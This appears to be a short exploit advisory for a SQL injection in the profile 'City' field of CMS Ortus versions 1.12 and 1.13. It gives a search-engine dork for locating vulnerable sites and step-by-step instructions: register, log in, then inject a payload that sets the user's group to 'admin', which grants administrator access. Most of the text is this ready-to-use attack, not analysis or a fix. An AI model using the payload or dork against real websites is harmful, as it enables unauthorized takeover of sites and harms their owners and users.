CMS Ortus versions 1.13 and below suffer from a remote SQL injection vulnerability.
a396a159b55b1ddf15c23bb9aa6c94693551b633f0143eca70759aba618ecaa5
Author: otmorozok428, http://forum.antichat.ru
Products: CMS Ortus 1.12, CMS Ortus 1.13
Vendor: http://ortus.nirn.ru
Download: http://ortus.nirn.ru/files/ortus1-12.zip, http://ortus.nirn.ru/files/ortus1-13.zip
Dork (for ALL Versions of CMS Ortus): inurl:index.php?ortupg=
SQL Injection Vulnerability in POST Form:
http://www.site.com/index.php?mod=users_edit_pub
"City" field: [SQL Injection]
EXAMPLE:
1. You need to register first
http://www.site.com/index.php?mod=users_add
2. Authentication
http://www.site.com/index.php?mod=auth
3. Edit user profile next
http://www.site.com/index.php?mod=users_edit_pub
4. Exploit "City" field (receive admin rights)
MyCity', `group`='admin
5. Login to admin area
http://www.site.com/auth.php
You can see demo video here:
http://depositfiles.com/files/h8sbwikey